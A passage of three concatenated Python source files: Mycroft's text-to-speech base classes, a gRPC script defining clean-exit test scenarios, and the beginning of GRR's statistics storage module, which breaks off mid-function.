# See the License for the specific language governing permissions and
# limitations under the License.
#
import hashlib
import os
import random
import re
import sys
from abc import ABCMeta, abstractmethod
from threading import Thread
from time import time, sleep
import os.path
from os.path import dirname, exists, isdir, join
import mycroft.util
from mycroft.enclosure.api import EnclosureAPI
from mycroft.configuration import Configuration
from mycroft.messagebus.message import Message
from mycroft.metrics import report_timing, Stopwatch
from mycroft.util import (
play_wav, play_mp3, check_for_signal, create_signal, resolve_resource_file
)
from mycroft.util.log import LOG
from queue import Queue, Empty
def send_playback_metric(stopwatch, ident):
"""
Send playback metrics in a background thread
"""
def do_send(stopwatch, ident):
report_timing(ident, 'speech_playback', stopwatch)
t = Thread(target=do_send, args=(stopwatch, ident))
t.daemon = True
t.start()
class PlaybackThread(Thread):
"""
Thread class for playing back tts audio and sending
viseme data to enclosure.
"""
def __init__(self, queue):
super(PlaybackThread, self).__init__()
self.queue = queue
self._terminated = False
self._processing_queue = False
def init(self, tts):
self.tts = tts
def clear_queue(self):
"""
Remove all pending playbacks.
"""
while not self.queue.empty():
self.queue.get()
try:
self.p.terminate()
except Exception:
pass
def run(self):
"""
Thread main loop. get audio and viseme data from queue
and play.
"""
while not self._terminated:
try:
snd_type, data, visemes, ident = self.queue.get(timeout=2)
self.blink(0.5)
if not self._processing_queue:
self._processing_queue = True
self.tts.begin_audio()
stopwatch = Stopwatch()
with stopwatch:
if snd_type == 'wav':
self.p = play_wav(data)
elif snd_type == 'mp3':
self.p = play_mp3(data)
if visemes:
self.show_visemes(visemes)
self.p.communicate()
self.p.wait()
send_playback_metric(stopwatch, ident)
if self.queue.empty():
self.tts.end_audio()
self._processing_queue = False
self.blink(0.2)
except Empty:
pass
except Exception as e:
LOG.exception(e)
if self._processing_queue:
self.tts.end_audio()
self._processing_queue = False
def show_visemes(self, pairs):
"""
Send viseme data to enclosure
Args:
pairs(list): Visime and timing pair
Returns:
True if button has been pressed.
"""
if self.enclosure:
self.enclosure.mouth_viseme(time(), pairs)
def clear(self):
""" Clear all pending actions for the TTS playback thread. """
self.clear_queue()
def blink(self, rate=1.0):
""" Blink mycroft's eyes """
if self.enclosure and random.random() < rate:
self.enclosure.eyes_blink("b")
def stop(self):
""" Stop thread """
self._terminated = True
self.clear_queue()
class TTS:
"""
TTS abstract class to be implemented by all TTS engines.
It aggregates the minimum required parameters and exposes
``execute(sentence)`` and ``validate_ssml(sentence)`` functions.
Args:
lang (str):
config (dict): Configuration for this specific tts engine
validator (TTSValidator): Used to verify proper installation
phonetic_spelling (bool): Whether to spell certain words phonetically
ssml_tags (list): Supported ssml properties. Ex. ['speak', 'prosody']
"""
__metaclass__ = ABCMeta
def __init__(self, lang, config, validator, audio_ext='wav',
phonetic_spelling=True, ssml_tags=None):
super(TTS, self).__init__()
self.bus = None # initalized in "init" step
self.lang = lang or 'en-us'
self.config = config
self.validator = validator
self.phonetic_spelling = phonetic_spelling
self.audio_ext = audio_ext
self.ssml_tags = ssml_tags or []
self.voice = config.get("voice")
self.filename = '/tmp/tts.wav'
self.enclosure = None
random.seed()
self.queue = Queue()
self.playback = PlaybackThread(self.queue)
self.playback.start()
self.clear_cache()
self.spellings = self.load_spellings()
self.tts_name = type(self).__name__
def load_spellings(self):
"""Load phonetic spellings of words as dictionary"""
path = join('text', self.lang, 'phonetic_spellings.txt')
spellings_file = resolve_resource_file(path)
if not spellings_file:
return {}
try:
with open(spellings_file) as f:
lines = filter(bool, f.read().split('\n'))
lines = [i.split(':') for i in lines]
return {key.strip(): value.strip() for key, value in lines}
except ValueError:
LOG.exception('Failed to load phonetic spellings.')
return {}
def begin_audio(self):
"""Helper function for child classes to call in execute()"""
# Create signals informing start of speech
self.bus.emit(Message("recognizer_loop:audio_output_start"))
def end_audio(self):
"""
Helper function for child classes to call in execute().
Sends the recognizer_loop:audio_output_end message, indicating
that speaking is done for the moment. It also checks if cache
directory needs cleaning to free up disk space.
"""
self.bus.emit(Message("recognizer_loop:audio_output_end"))
# Clean the cache as needed
cache_dir = mycroft.util.get_cache_directory("tts/" + self.tts_name)
mycroft.util.curate_cache(cache_dir, min_free_percent=100)
# This check will clear the "signal"
check_for_signal("isSpeaking")
def init(self, bus):
""" Performs intial setup of TTS object.
Arguments:
bus: Mycroft messagebus connection
"""
self.bus = bus
self.playback.init(self)
self.enclosure = EnclosureAPI(self.bus)
self.playback.enclosure = self.enclosure
def get_tts(self, sentence, wav_file):
"""
Abstract method that a tts implementation needs to implement.
Should get data from tts.
Args:
sentence(str): Sentence to synthesize
wav_file(str): output file
Returns:
tuple: (wav_file, phoneme)
"""
pass
def modify_tag(self, tag):
"""Override to modify each supported ssml tag"""
return tag
@staticmethod
def remove_ssml(text):
return re.sub('<[^>]*>', '', text).replace(' ', ' ')
def validate_ssml(self, utterance):
"""
Check if engine supports ssml, if not remove all tags
Remove unsupported / invalid tags
Args:
utterance(str): Sentence to validate
Returns: validated_sentence (str)
"""
# if ssml is not supported by TTS engine remove all tags
if not self.ssml_tags:
return self.remove_ssml(utterance)
# find ssml tags in string
tags = re.findall('<[^>]*>', utterance)
for tag in tags:
if any(supported in tag for supported in self.ssml_tags):
utterance = utterance.replace(tag, self.modify_tag(tag))
else:
# remove unsupported tag
utterance = utterance.replace(tag, "")
# return text with supported ssml tags only
return utterance.replace(" ", " ")
def _preprocess_sentence(self, sentence):
""" Default preprocessing is no preprocessing.
This method can be overridden to create chunks suitable to the
TTS engine in question.
Arguments:
sentence (str): sentence to preprocess
Returns:
list: list of sentence parts
"""
return [sentence]
def execute(self, sentence, ident=None):
"""
Convert sentence to speech, preprocessing out unsupported ssml
The method caches results if possible using the hash of the
sentence.
Args:
sentence: Sentence to be spoken
ident: Id reference to current interaction
"""
sentence = self.validate_ssml(sentence)
create_signal("isSpeaking")
if self.phonetic_spelling:
for word in re.findall(r"[\w']+", sentence):
if word.lower() in self.spellings:
sentence = sentence.replace(word,
self.spellings[word.lower()])
chunks = self._preprocess_sentence(sentence)
for sentence in chunks:
key = str(hashlib.md5(
sentence.encode('utf-8', 'ignore')).hexdigest())
wav_file = os.path.join(
mycroft.util.get_cache_directory("tts/" + self.tts_name),
key + '.' + self.audio_ext)
if os.path.exists(wav_file):
LOG.debug("TTS cache hit")
phonemes = self.load_phonemes(key)
else:
wav_file, phonemes = self.get_tts(sentence, wav_file)
if phonemes:
self.save_phonemes(key, phonemes)
vis = self.viseme(phonemes)
self.queue.put((self.audio_ext, wav_file, vis, ident))
def viseme(self, phonemes):
"""
Create visemes from phonemes. Needs to be implemented for all
tts backend
Args:
phonemes(str): String with phoneme data
"""
return None
def clear_cache(self):
""" Remove all cached files. """
if not os.path.exists(mycroft.util.get_cache_directory('tts')):
return
for d in os.listdir(mycroft.util.get_cache_directory("tts")):
dir_path = os.path.join(mycroft.util.get_cache_directory("tts"), d)
if os.path.isdir(dir_path):
for f in os.listdir(dir_path):
file_path = os.path.join(dir_path, f)
if os.path.isfile(file_path):
os.unlink(file_path)
# If no sub-folders are present, check if it is a file & clear it
elif os.path.isfile(dir_path):
os.unlink(dir_path)
def save_phonemes(self, key, phonemes):
"""
Cache phonemes
Args:
key: Hash key for the sentence
phonemes: phoneme string to save
"""
cache_dir = mycroft.util.get_cache_directory("tts/" + self.tts_name)
pho_file = os.path.join(cache_dir, key + ".pho")
try:
with open(pho_file, "w") as cachefile:
cachefile.write(phonemes)
except Exception:
LOG.exception("Failed to write {} to cache".format(pho_file))
pass
def load_phonemes(self, key):
"""
Load phonemes from cache file.
Args:
Key: Key identifying phoneme cache
"""
pho_file = os.path.join(
mycroft.util.get_cache_directory("tts/" + self.tts_name),
key + ".pho")
if os.path.exists(pho_file):
try:
with open(pho_file, "r") as cachefile:
phonemes = cachefile.read().strip()
return phonemes
except Exception:
LOG.debug("Failed to read .PHO from cache")
return None
def __del__(self):
self.playback.stop()
self.playback.join()
class TTSValidator:
"""
TTS Validator abstract class to be implemented by all TTS engines.
It exposes and implements ``validate(tts)`` function as a template to
validate the TTS engines.
"""
__metaclass__ = ABCMeta
def __init__(self, tts):
self.tts = tts
def validate(self):
self.validate_dependencies()
self.validate_instance()
self.validate_filename()
self.validate_lang()
self.validate_connection()
def validate_dependencies(self):
pass
def validate_instance(self):
clazz = self.get_tts_class()
if not isinstance(self.tts, clazz):
raise AttributeError('tts must be instance of ' + clazz.__name__)
def validate_filename(self):
filename = self.tts.filename
if not (filename and filename.endswith('.wav')):
raise AttributeError('file: %s must be in .wav format!' % filename)
dir_path = dirname(filename)
if not (exists(dir_path) and isdir(dir_path)):
raise AttributeError('filename: %s is not valid!' % filename)
@abstractmethod
def validate_lang(self):
pass
@abstractmethod
def validate_connection(self):
pass
@abstractmethod
def get_tts_class(self):
pass
class TTSFactory:
from mycroft.tts.espeak_tts import ESpeak
from mycroft.tts.fa_tts import FATTS
from mycroft.tts.google_tts import GoogleTTS
from mycroft.tts.mary_tts import MaryTTS
from mycroft.tts.mimic_tts import Mimic
from mycroft.tts.spdsay_tts import SpdSay
from mycroft.tts.bing_tts import BingTTS
from mycroft.tts.ibm_tts import WatsonTTS
from mycroft.tts.responsive_voice_tts import ResponsiveVoice
from mycroft.tts.mimic2_tts import Mimic2
CLASSES = {
"mimic": Mimic,
"mimic2": Mimic2,
"google": GoogleTTS,
"marytts": MaryTTS,
"fatts": FATTS,
"espeak": ESpeak,
"spdsay": SpdSay,
"watson": WatsonTTS,
"bing": BingTTS,
"responsive_voice": ResponsiveVoice
}
@staticmethod
def create():
"""
Factory method to create a TTS engine based on configuration.
The configuration file ``mycroft.conf`` contains a ``tts`` section with
the name of a TTS module to be read by this method.
"tts": {
"module": <engine_name>
}
"""
config = Configuration.get()
lang = config.get("lang", "en-us")
tts_module = config.get('tts', {}).get('module', 'mimic')
tts_config = config.get('tts', {}).get(tts_module, {})
tts_lang = tts_config.get('lang', lang)
clazz = TTSFactory.CLASSES.get(tts_module)
tts = clazz(tts_lang, tts_config)
tts.validator.validate()
return tts
|
_exit_scenarios.py
|
# Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defines a number of module-scope gRPC scenarios to test clean exit."""
import argparse
import threading
import time
import logging
import grpc
from tests.unit.framework.common import test_constants
WAIT_TIME = 1000
REQUEST = b'request'
UNSTARTED_SERVER = 'unstarted_server'
RUNNING_SERVER = 'running_server'
POLL_CONNECTIVITY_NO_SERVER = 'poll_connectivity_no_server'
POLL_CONNECTIVITY = 'poll_connectivity'
IN_FLIGHT_UNARY_UNARY_CALL = 'in_flight_unary_unary_call'
IN_FLIGHT_UNARY_STREAM_CALL = 'in_flight_unary_stream_call'
IN_FLIGHT_STREAM_UNARY_CALL = 'in_flight_stream_unary_call'
IN_FLIGHT_STREAM_STREAM_CALL = 'in_flight_stream_stream_call'
IN_FLIGHT_PARTIAL_UNARY_STREAM_CALL = 'in_flight_partial_unary_stream_call'
IN_FLIGHT_PARTIAL_STREAM_UNARY_CALL = 'in_flight_partial_stream_unary_call'
IN_FLIGHT_PARTIAL_STREAM_STREAM_CALL = 'in_flight_partial_stream_stream_call'
UNARY_UNARY = b'/test/UnaryUnary'
UNARY_STREAM = b'/test/UnaryStream'
STREAM_UNARY = b'/test/StreamUnary'
STREAM_STREAM = b'/test/StreamStream'
PARTIAL_UNARY_STREAM = b'/test/PartialUnaryStream'
PARTIAL_STREAM_UNARY = b'/test/PartialStreamUnary'
PARTIAL_STREAM_STREAM = b'/test/PartialStreamStream'
TEST_TO_METHOD = {
IN_FLIGHT_UNARY_UNARY_CALL: UNARY_UNARY,
IN_FLIGHT_UNARY_STREAM_CALL: UNARY_STREAM,
IN_FLIGHT_STREAM_UNARY_CALL: STREAM_UNARY,
IN_FLIGHT_STREAM_STREAM_CALL: STREAM_STREAM,
IN_FLIGHT_PARTIAL_UNARY_STREAM_CALL: PARTIAL_UNARY_STREAM,
IN_FLIGHT_PARTIAL_STREAM_UNARY_CALL: PARTIAL_STREAM_UNARY,
IN_FLIGHT_PARTIAL_STREAM_STREAM_CALL: PARTIAL_STREAM_STREAM,
}
def hang_unary_unary(request, servicer_context):
time.sleep(WAIT_TIME)
def hang_unary_stream(request, servicer_context):
time.sleep(WAIT_TIME)
def hang_partial_unary_stream(request, servicer_context):
for _ in range(test_constants.STREAM_LENGTH // 2):
yield request
time.sleep(WAIT_TIME)
def hang_stream_unary(request_iterator, servicer_context):
time.sleep(WAIT_TIME)
def hang_partial_stream_unary(request_iterator, servicer_context):
for _ in range(test_constants.STREAM_LENGTH // 2):
next(request_iterator)
time.sleep(WAIT_TIME)
def hang_stream_stream(request_iterator, servicer_context):
time.sleep(WAIT_TIME)
def hang_partial_stream_stream(request_iterator, servicer_context):
for _ in range(test_constants.STREAM_LENGTH // 2):
yield next(request_iterator) #pylint: disable=stop-iteration-return
time.sleep(WAIT_TIME)
class MethodHandler(grpc.RpcMethodHandler):
def __init__(self, request_streaming, response_streaming, partial_hang):
self.request_streaming = request_streaming
self.response_streaming = response_streaming
self.request_deserializer = None
self.response_serializer = None
self.unary_unary = None
self.unary_stream = None
self.stream_unary = None
self.stream_stream = None
if self.request_streaming and self.response_streaming:
if partial_hang:
self.stream_stream = hang_partial_stream_stream
else:
self.stream_stream = hang_stream_stream
elif self.request_streaming:
if partial_hang:
self.stream_unary = hang_partial_stream_unary
else:
self.stream_unary = hang_stream_unary
elif self.response_streaming:
if partial_hang:
self.unary_stream = hang_partial_unary_stream
else:
self.unary_stream = hang_unary_stream
else:
self.unary_unary = hang_unary_unary
class GenericHandler(grpc.GenericRpcHandler):
def service(self, handler_call_details):
if handler_call_details.method == UNARY_UNARY:
return MethodHandler(False, False, False)
elif handler_call_details.method == UNARY_STREAM:
return MethodHandler(False, True, False)
elif handler_call_details.method == STREAM_UNARY:
return MethodHandler(True, False, False)
elif handler_call_details.method == STREAM_STREAM:
return MethodHandler(True, True, False)
elif handler_call_details.method == PARTIAL_UNARY_STREAM:
return MethodHandler(False, True, True)
elif handler_call_details.method == PARTIAL_STREAM_UNARY:
return MethodHandler(True, False, True)
elif handler_call_details.method == PARTIAL_STREAM_STREAM:
return MethodHandler(True, True, True)
else:
return None
# Traditional executors will not exit until all their
# current jobs complete. Because we submit jobs that will
# never finish, we don't want to block exit on these jobs.
class DaemonPool(object):
def submit(self, fn, *args, **kwargs):
thread = threading.Thread(target=fn, args=args, kwargs=kwargs)
thread.daemon = True
thread.start()
def shutdown(self, wait=True):
pass
def infinite_request_iterator():
while True:
yield REQUEST
if __name__ == '__main__':
logging.basicConfig()
parser = argparse.ArgumentParser()
parser.add_argument('scenario', type=str)
parser.add_argument(
'--wait_for_interrupt', dest='wait_for_interrupt', action='store_true')
args = parser.parse_args()
if args.scenario == UNSTARTED_SERVER:
server = grpc.server(DaemonPool(), options=(('grpc.so_reuseport', 0),))
if args.wait_for_interrupt:
time.sleep(WAIT_TIME)
elif args.scenario == RUNNING_SERVER:
server = grpc.server(DaemonPool(), options=(('grpc.so_reuseport', 0),))
port = server.add_insecure_port('[::]:0')
server.start()
if args.wait_for_interrupt:
time.sleep(WAIT_TIME)
elif args.scenario == POLL_CONNECTIVITY_NO_SERVER:
channel = grpc.insecure_channel('localhost:12345')
def connectivity_callback(connectivity):
pass
channel.subscribe(connectivity_callback, try_to_connect=True)
if args.wait_for_interrupt:
time.sleep(WAIT_TIME)
elif args.scenario == POLL_CONNECTIVITY:
server = grpc.server(DaemonPool(), options=(('grpc.so_reuseport', 0),))
port = server.add_insecure_port('[::]:0')
server.start()
channel = grpc.insecure_channel('localhost:%d' % port)
def connectivity_callback(connectivity):
pass
channel.subscribe(connectivity_callback, try_to_connect=True)
if args.wait_for_interrupt:
time.sleep(WAIT_TIME)
else:
handler = GenericHandler()
server = grpc.server(DaemonPool(), options=(('grpc.so_reuseport', 0),))
port = server.add_insecure_port('[::]:0')
server.add_generic_rpc_handlers((handler,))
server.start()
channel = grpc.insecure_channel('localhost:%d' % port)
method = TEST_TO_METHOD[args.scenario]
if args.scenario == IN_FLIGHT_UNARY_UNARY_CALL:
multi_callable = channel.unary_unary(method)
future = multi_callable.future(REQUEST)
result, call = multi_callable.with_call(REQUEST)
elif (args.scenario == IN_FLIGHT_UNARY_STREAM_CALL or
args.scenario == IN_FLIGHT_PARTIAL_UNARY_STREAM_CALL):
multi_callable = channel.unary_stream(method)
response_iterator = multi_callable(REQUEST)
for response in response_iterator:
pass
elif (args.scenario == IN_FLIGHT_STREAM_UNARY_CALL or
args.scenario == IN_FLIGHT_PARTIAL_STREAM_UNARY_CALL):
multi_callable = channel.stream_unary(method)
future = multi_callable.future(infinite_request_iterator())
result, call = multi_callable.with_call(
iter([REQUEST] * test_constants.STREAM_LENGTH))
elif (args.scenario == IN_FLIGHT_STREAM_STREAM_CALL or
args.scenario == IN_FLIGHT_PARTIAL_STREAM_STREAM_CALL):
multi_callable = channel.stream_stream(method)
response_iterator = multi_callable(infinite_request_iterator())
for response in response_iterator:
pass
|
stats_store.py
|
#!/usr/bin/env python
"""Storage implementation for gathered statistics.
Statistics collected by StatsCollector (see lib/stats.py) is stored in AFF4
space. Statistics data for different parts of the system is separated by
process ids. For example, for the frontend, process id may be "frontend",
for worker - "worker", etc.
On the AFF4 statistics data is stored under aff4:/stats_store.
aff4:/stats_store itself is a URN of a StatsStore object that can be used
for querying stored data and saving new stats.
For every process id, aff4:/stats_store/<process id> object of type
StatsStoreProcessData is created. This object stores metadata of all
the metrics in the METRICS_METADATA field. All the collected statistics
data are written as aff4:stats_store/<metric name> attributes to the
aff4:/stats_store/<process id> row. This way we can easily and efficiently
query statistics data for a given set of metrics for a given process id
for a given time range.
Metrics metadata are stored separately from the values themselves for
efficiency reasons. Metadata objects are created when metrics are registered.
They carry extensive information about the metrics, like metric name and
docstring, metric type, etc. This information does not change (unless changes
GRR's source code changes) and so it doesn't make sense to duplicate it
every time we write a new set of statistics data to the datastore. Therefore
metadata for all the metrics is stored in
StatsStoreProcessData.METRICS_METADATA. Metrics' values themselves are
stored as datastore row attributes.
Statistics is written to the data store by StatsStoreWorker. It periodically
fetches values for all the metrics and writes them to corresponding
object on AFF4.
"""
import logging
import re
import threading
import time
from grr import config
from grr.lib import rdfvalue
from grr.lib import registry
from grr.lib import stats
from grr.server.grr_response_server import access_control
from grr.server.grr_response_server import aff4
from grr.server.grr_response_server import data_store
from grr.server.grr_response_server import stats_values
from grr.server.grr_response_server import timeseries
class StatsStoreProcessData(aff4.AFF4Object):
"""Stores stats data for a particular process."""
class SchemaCls(aff4.AFF4Object.SchemaCls):
"""Schema for StatsStoreProcessData."""
METRICS_METADATA = aff4.Attribute(
"aff4:stats_store_process_data/metrics_metadata",
stats_values.StatsStoreMetricsMetadata,
creates_new_object_version=False,
versioned=False)
def WriteMetadataDescriptors(self, metrics_metadata, timestamp=None):
current_metadata = self.Get(
self.Schema.METRICS_METADATA,
default=stats_values.StatsStoreMetricsMetadata())
if current_metadata.AsDict() != metrics_metadata:
store_metadata = stats_values.StatsStoreMetricsMetadata(
metrics=metrics_metadata.values())
self.AddAttribute(
self.Schema.METRICS_METADATA, store_metadata, age=timestamp)
self.Flush()
def WriteStats(self, timestamp=None):
metrics_metadata = stats.STATS.GetAllMetricsMetadata()
self.WriteMetadataDescriptors(metrics_metadata, timestamp=timestamp)
with data_store.DB.GetMutationPool() as mutation_pool:
mutation_pool.StatsWriteMetrics(
self.urn, metrics_metadata, timestamp=timestamp)
def DeleteStats(self, timestamp=data_store.DataStore.ALL_TIMESTAMPS):
"""Deletes all stats in the given time range."""
with data_store.DB.GetMutationPool() as mutation_pool:
mutation_pool.StatsDeleteStatsInRange(self.urn, timestamp)
class StatsStore(aff4.AFF4Volume):
"""Implementation of the long-term storage of collected stats data.
This class allows to write current stats data to the data store, read
and delete them. StatsStore uses data_store to store the data.
All historical stats data are stored in a single data store subject per
process. By process we mean, for example: "admin UI", "worker #1",
"worker #3", etc. Stats data are stored as subject's attributes.
"""
DATA_STORE_ROOT = rdfvalue.RDFURN("aff4:/stats_store")
ALL_TIMESTAMPS = data_store.DataStore.ALL_TIMESTAMPS
NEWEST_TIMESTAMP = data_store.DataStore.NEWEST_TIMESTAMP
def Initialize(self):
super(StatsStore, self).Initialize()
if self.urn is None:
self.urn = self.DATA_STORE_ROOT
def WriteStats(self, process_id=None, timestamp=None):
"""Writes current stats values to the data store with a given timestamp."""
if not process_id:
raise ValueError("process_id can't be None")
process_data = aff4.FACTORY.Create(
self.urn.Add(process_id),
StatsStoreProcessData,
mode="rw",
token=self.token)
process_data.WriteStats(timestamp=timestamp)
def ListUsedProcessIds(self):
"""List process ids that were used when saving data to stats store."""
return [urn.Basename() for urn in self.ListChildren()]
def ReadMetadata(self, process_id=None):
"""Reads metadata of stored values for the given process."""
if not process_id:
raise ValueError("process_id can't be None")
results = self.MultiReadMetadata(process_ids=[process_id])
try:
return results[process_id]
except KeyError:
return {}
def MultiReadMetadata(self, process_ids=None):
"""Reads metadata of stored values for multiple given processes."""
if not process_ids:
process_ids = self.ListUsedProcessIds()
subjects = [
self.DATA_STORE_ROOT.Add(process_id) for process_id in process_ids
]
subjects_data = aff4.FACTORY.MultiOpen(
subjects, mode="r", token=self.token, aff4_type=StatsStoreProcessData)
results = {}
for subject_data in subjects_data:
results[subject_data.urn.Basename()] = subject_data.Get(
subject_data.Schema.METRICS_METADATA)
for process_id in process_ids:
results.setdefault(process_id, stats_values.StatsStoreMetricsMetadata())
return results
def ReadStats(self,
process_id=None,
metric_name=None,
timestamp=ALL_TIMESTAMPS,
limit=10000):
"""Reads stats values from the data store for the current process."""
if not process_id:
raise ValueError("process_id can't be None")
results = self.MultiReadStats(
process_ids=[process_id],
metric_name=metric_name,
timestamp=timestamp,
limit=limit)
try:
return results[process_id]
except KeyError:
return {}
def MultiReadStats(self,
process_ids=None,
metric_name=None,
timestamp=ALL_TIMESTAMPS,
limit=10000):
"""Reads historical data for multiple process ids at once."""
if not process_ids:
process_ids = self.ListUsedProcessIds()
multi_metadata = self.MultiReadMetadata(process_ids=process_ids)
subjects = [
self.DATA_STORE_ROOT.Add(process_id) for process_id in process_ids
]
return data_store.DB.StatsReadDataForProcesses(
subjects, metric_name, multi_metadata, timestamp=timestamp, limit=limit)
def DeleteStats(self, process_id=None, timestamp=ALL_TIMESTAMPS):
"""Deletes all stats in the given time range."""
if not process_id:
raise ValueError("process_id can't be None")
process_data = aff4.FACTORY.Create(
self.urn.Add(process_id),
StatsStoreProcessData,
mode="w",
token=self.token)
process_data.DeleteStats(timestamp=timestamp)
class StatsStoreDataQuery(object):
"""Query class used to results from StatsStore.ReadStats/MultiReadStats.
NOTE: this class is mutable. Although it's designed with call-chaining in
mind, you have to create new query object for every new query.
I.e. - this *will not* work:
query = stats_store.StatsStoreDataQuery(stats_data)
counter1 = query.In("pid1").In("counter").SeriesCount()
counter2 = query.In("pidw").In("counter").SeriesCount()
But this *will* work:
query = stats_store.StatsStoreDataQuery(stats_data)
counter1 = query.In("pid1").In("counter").SeriesCount()
query = stats_store.StatsStoreDataQuery(stats_data)
counter2 = query.In("pidw").In("counter").SeriesCount()
"""
VALUE_QUERY = "value"
DISTRIBUTION_SUM_QUERY = "distribution_sum"
DISTRIBUTION_COUNT_QUERY = "distribution_count"
def __init__(self, stats_data):
super(StatsStoreDataQuery, self).__init__()
self.current_dicts = [stats_data]
self.time_series = None
self.path = []
self.query_type = None
self.aggregate_via = None
self.sample_interval = None
def _TimeSeriesFromData(self, data, attr=None):
"""Build time series from StatsStore data."""
series = timeseries.Timeseries()
for value, timestamp in data:
if attr:
try:
series.Append(getattr(value, attr), timestamp)
except AttributeError:
raise ValueError("Can't find attribute %s in value %s." % (attr,
value))
else:
if hasattr(value, "sum") or hasattr(value, "count"):
raise ValueError(
"Can't treat complext type as simple value: %s" % value)
series.Append(value, timestamp)
return series
@property
def ts(self):
"""Return single timeseries.Timeseries built by this query."""
if self.time_series is None:
raise RuntimeError("Time series weren't built yet.")
if not self.time_series:
return timeseries.Timeseries()
return self.time_series[0]
def In(self, regex):
"""Narrow query's scope."""
self.path.append(regex)
new_current_dicts = []
for current_dict in self.current_dicts:
for key, value in current_dict.iteritems():
m = re.match(regex, key)
if m and m.string == m.group(0):
new_current_dicts.append(value)
self.current_dicts = new_current_dicts
return self
def _GetNestedValues(self, dicts):
"""Get all values nested in the given dictionaries.
Args:
dicts: List of dictionaries to go through.
Returns:
([nested values], status) where status is True if nested values are
dictionaries and False otherwise.
Raises:
RuntimeError: if some nested values are dictionaries and some are not.
"""
new_dicts = []
for current_dict in dicts:
for _, value in current_dict.iteritems():
new_dicts.append(value)
sub_dicts = [x for x in new_dicts if hasattr(x, "iteritems")]
if not sub_dicts:
return (new_dicts, False)
elif len(sub_dicts) == len(new_dicts):
return (new_dicts, True)
else:
raise RuntimeError("Inconsistent values hierarchy.")
def InAll(self):
"""Use all metrics in the current scope."""
self.path.append(":all")
while True:
self.current_dicts, status = self._GetNestedValues(self.current_dicts)
if not status:
break
return self
def MakeIncreasing(self):
"""Fixes the time series so that it does not decrement."""
if self.time_series is None:
raise RuntimeError("MakeIncreasing must be called after Take*().")
for time_serie in self.time_series:
time_serie.MakeIncreasing()
return self
def Normalize(self, period, start_time, stop_time, **kwargs):
"""Resample the query with given sampling interval."""
if self.time_series is None:
raise RuntimeError("Normalize must be called after Take*().")
self.sample_interval = period
self.start_time = start_time
self.stop_time = stop_time
for time_serie in self.time_series:
time_serie.Normalize(period, start_time, stop_time, **kwargs)
return self
def InTimeRange(self, range_start, range_end):
"""Only use data points withing given time range."""
if self.time_series is None:
raise RuntimeError("InTimeRange must be called after Take*().")
if range_start is None:
raise ValueError("range_start can't be None")
if range_end is None:
raise ValueError("range_end can't be None")
for time_serie in self.time_series:
time_serie.FilterRange(start_time=range_start, stop_time=range_end)
return self
def TakeValue(self):
"""Assume metrics in this query are plain values."""
self.query_type = self.VALUE_QUERY
self.time_series = []
for current_dict in self.current_dicts:
self.time_series.append(self._TimeSeriesFromData(current_dict))
return self
def TakeDistributionSum(self):
"""Assume metrics in this query are distributions. Use their sums."""
self.query_type = self.DISTRIBUTION_SUM_QUERY
self.time_series = []
for current_dict in self.current_dicts:
self.time_series.append(self._TimeSeriesFromData(current_dict, "sum"))
return self
def TakeDistributionCount(self):
"""Assume metrics in this query are distributions. Use their counts."""
self.query_type = self.DISTRIBUTION_COUNT_QUERY
self.time_series = []
for current_dict in self.current_dicts:
self.time_series.append(self._TimeSeriesFromData(current_dict, "count"))
return self
def AggregateViaSum(self):
"""Aggregate multiple time series into one by summing them."""
if self.time_series is None:
raise RuntimeError("AggregateViaSum must be called after Take*().")
if self.sample_interval is None:
raise RuntimeError("Resample() must be called prior to "
"AggregateViaSum().")
if not self.time_series:
return self
if len(self.time_series) == 1:
return self
current_serie = self.time_series[0]
for serie in self.time_series[1:]:
current_serie.Add(serie)
self.time_series = [current_serie]
return self
def AggregateViaMean(self):
"""Aggregate multiple time series into one by calculating mean value."""
num_time_series = len(self.time_series)
self.AggregateViaSum()
self.ts.Rescale(1.0 / num_time_series)
return self
def SeriesCount(self):
"""Return number of time series the query was narrowed to."""
if not self.time_series:
if not self.current_dicts:
return 0
else:
return len(self.current_dicts)
else:
return len(self.time_series)
def Rate(self):
"""Apply rate function to all time series in this query."""
if self.time_series is None:
raise RuntimeError("Rate must be called after Take*().")
if self.sample_interval is None:
raise RuntimeError("Normalize() must be called prior to Rate().")
for time_serie in self.time_series:
time_serie.ToDeltas()
time_serie.Rescale(1.0 / self.sample_interval.seconds)
return self
def Scale(self, multiplier):
"""Scale value in all time series in this query."""
if self.time_series is None:
raise RuntimeError("Scale must be called after Take*().")
for time_serie in self.time_series:
time_serie.Rescale(multiplier)
return self
def Mean(self):
"""Calculate mean value of a single time serie in this query."""
if self.time_series is None:
raise RuntimeError("Mean must be called after Take*().")
if not self.time_series:
return 0
if len(self.time_series) != 1:
raise RuntimeError("Can only return mean for a single time serie.")
return self.time_series[0].Mean()
# Global StatsStore object
STATS_STORE = None
class StatsStoreWorker(object):
"""StatsStoreWorker periodically dumps stats data into the stats store."""
def __init__(self,
stats_store,
process_id,
thread_name="grr_stats_saver",
sleep=None):
super(StatsStoreWorker, self).__init__()
self.stats_store = stats_store
self.process_id = process_id
self.thread_name = thread_name
self.sleep = sleep or config.CONFIG["StatsStore.write_interval"]
def _RunLoop(self):
while True:
logging.debug("Writing stats to stats store.")
try:
self.stats_store.WriteStats(process_id=self.process_id)
except Exception as e: # pylint: disable=broad-except
logging.exception("StatsStore exception caught during WriteStats(): %s",
e)
logging.debug("Removing old stats from stats store." "")
# Maximum time we keep stats store data is three days.
stats_store_ttl = 60 * 60 * 24 * 3
try:
now = rdfvalue.RDFDatetime.Now().AsMicrosecondsSinceEpoch()
self.stats_store.DeleteStats(
process_id=self.process_id,
timestamp=(0, now - stats_store_ttl * 1000000))
except Exception as e: # pylint: disable=broad-except
logging.exception(
"StatsStore exception caught during DeleteStats(): %s", e)
time.sleep(self.sleep)
def Run(self):
self.RunAsync().join()
def RunAsync(self):
self.running_thread = threading.Thread(
name=self.thread_name, target=self._RunLoop)
self.running_thread.daemon = True
self.running_thread.start()
return self.running_thread
class StatsStoreInit(registry.InitHook):
"""Hook that inits global STATS_STORE object and stats store worker."""
pre = [aff4.AFF4InitHook]
def RunOnce(self):
"""Initializes StatsStore and StatsStoreWorker."""
# SetUID is required to create and write to aff4:/stats_store
